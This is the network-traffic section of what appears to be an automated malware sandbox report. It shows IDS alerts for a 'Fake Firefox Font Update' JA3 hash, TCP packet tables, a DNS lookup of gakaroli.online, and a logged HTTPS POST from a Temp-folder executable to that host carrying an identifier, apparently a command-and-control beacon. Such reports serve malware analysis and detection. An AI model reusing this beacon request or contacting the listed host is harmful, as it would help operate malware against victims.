                                                                                                2024-11-30T02:25:26.739226+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449797172.67.141.133443TCP
                                                                                                2024-11-30T02:25:28.673993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449803172.67.141.133443TCP
                                                                                                2024-11-30T02:25:31.106397+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449809172.67.141.133443TCP
                                                                                                2024-11-30T02:25:33.734459+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449815172.67.141.133443TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 30, 2024 02:25:11.198446989 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:11.198488951 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:11.198811054 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:11.199850082 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:11.199866056 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:12.479952097 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:12.480061054 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:12.501152992 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:12.501166105 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:12.501581907 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:12.585895061 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:12.585930109 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:12.585990906 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.319341898 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.319658995 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.319693089 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.319750071 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.319767952 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.320255995 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.320288897 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.320327044 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.320327044 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.320338011 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.327721119 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.331115961 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.331130981 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.344326019 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.345998049 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.346007109 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.439201117 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.439440012 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.439450026 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.524569035 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.524660110 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.524672031 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.532397985 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.532509089 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.532593012 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.532601118 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.532860994 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.540205002 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.548119068 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.548197031 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.548204899 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.555967093 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.556045055 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.556051970 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.563755035 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.563797951 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.563805103 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.571578979 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.571650028 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.571656942 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.586267948 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.586323977 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.586332083 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.593259096 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.593326092 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.593333006 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600269079 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600302935 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600337029 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.600344896 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600553036 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.644371033 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721599102 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721683979 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721709013 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.721724987 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721790075 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.723961115 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.724119902 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.724188089 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.724195957 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.735125065 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.735184908 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.735193968 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.735306025 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.739963055 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.739970922 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.740062952 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.740067005 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.740204096 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.740314960 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.740331888 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.777091980 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.777108908 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.777179956 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.777493000 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.777503967 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.993879080 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.994029045 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:14.997481108 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:14.997487068 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.997725964 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.999955893 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:14.999984026 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.000030994 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.667329073 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.667426109 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.668067932 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.668251991 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.668256044 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.731861115 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.731909990 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.732047081 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.732671976 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.732686043 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.012135029 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.012217045 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.013500929 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.013514042 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.013741016 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.017827988 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.017846107 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.017853975 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.681955099 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.682070971 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.682209015 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.682238102 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.682249069 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.682255030 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:19.017501116 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:19.017538071 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:19.017637014 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:19.018151999 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:19.018170118 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.231977940 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.232067108 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.233304977 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.233313084 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.233556986 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.234426022 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234618902 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234653950 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.234764099 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234800100 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.234934092 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234978914 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.235105038 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.235122919 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.446320057 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.446388960 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.446546078 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.451265097 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.451289892 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.451302052 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.451307058 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.490266085 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.490303040 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.490396023 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.490808010 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.490828991 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.751374960 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.751442909 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.753027916 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.753046036 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.753283024 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.754172087 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.754172087 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.754188061 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384478092 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384548903 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384649992 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.384682894 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384697914 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.384697914 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.384707928 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384715080 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.410732031 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.410764933 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.410851002 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.411106110 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.411118984 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.669837952 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.669970989 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.671256065 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.671267986 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.671536922 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.674901962 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.674921036 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.674927950 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441421986 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441489935 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441540956 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.441615105 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.441631079 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441654921 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.441659927 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.478809118 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.478864908 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.478939056 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.479221106 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.479238033 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.739124060 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.739226103 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.749542952 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.749562025 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.749809980 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.750881910 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.750909090 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.750916004 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.368314028 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.368371964 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.368415117 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:27.387857914 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:27.387878895 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.387892962 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:27.387898922 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.462693930 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:27.462769985 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.462841988 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:27.463280916 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:27.463306904 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:28.673840046 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:28.673993111 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:28.682833910 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:28.682848930 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:28.683144093 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:28.683904886 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:28.684070110 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:28.684102058 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:28.684257030 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:28.684286118 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:29.454715967 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:29.454780102 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:29.454956055 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:29.500976086 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:29.500987053 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:29.501013041 CET49803443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:29.501018047 CET44349803172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:29.836277008 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:29.836302042 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:29.836559057 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:29.836973906 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:29.836985111 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.106268883 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.106396914 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.107583046 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.107589006 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.107820988 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.112132072 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.112363100 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.112412930 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.112591982 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.112627029 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.112776995 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.112817049 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:31.113953114 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:31.113970995 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:32.286890984 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:32.286973953 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:32.287040949 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:32.330199957 CET49809443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:32.330209970 CET44349809172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:32.396291018 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:32.396330118 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:32.396389961 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:32.396780968 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:32.396795034 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:33.734352112 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:33.734458923 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:33.735614061 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:33.735625982 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:33.735861063 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:33.739798069 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:33.743356943 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:33.743388891 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:34.402762890 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:34.402831078 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:34.402971029 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:34.403074980 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:34.403096914 CET44349815172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:34.403110027 CET49815443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:34.403115034 CET44349815172.67.141.133192.168.2.4

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 30, 2024 02:25:10.791153908 CET5877453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 02:25:11.191823959 CET53587741.1.1.1192.168.2.4

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 30, 2024 02:25:10.791153908 CET192.168.2.41.1.1.10x1d49Standard query (0)gakaroli.onlineA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 30, 2024 02:25:11.191823959 CET1.1.1.1192.168.2.40x1d49No error (0)gakaroli.online172.67.141.133A (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 02:25:11.191823959 CET1.1.1.1192.168.2.40x1d49No error (0)gakaroli.online104.21.87.52A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • gakaroli.online

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449766172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:12 UTC332OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                Content-Length: 96
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:12 UTC96OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                2024-11-30 01:25:13 UTC824INHTTP/1.1 200 OK
                                                                                                Date: Sat, 30 Nov 2024 01:25:13 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S6psgFzNI%2F%2F7s2zqbpf3UqCWGnASeV4z%2BqkTdm5srsjd2IyK8Mt8bbZlYDfj%2FxmSAayVhMDPqvPwf%2BUdmiOQHagxuK4v6QB2R5qX7jPrDGvmXpYzIyXoiWcnjCtdSyBXkP4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70ad2cc9542da-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1767&rtt_var=671&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1064&delivery_rate=1622222&cwnd=224&unsent_bytes=0&cid=a283afdaaad9ac7b&ts=851&x=0"
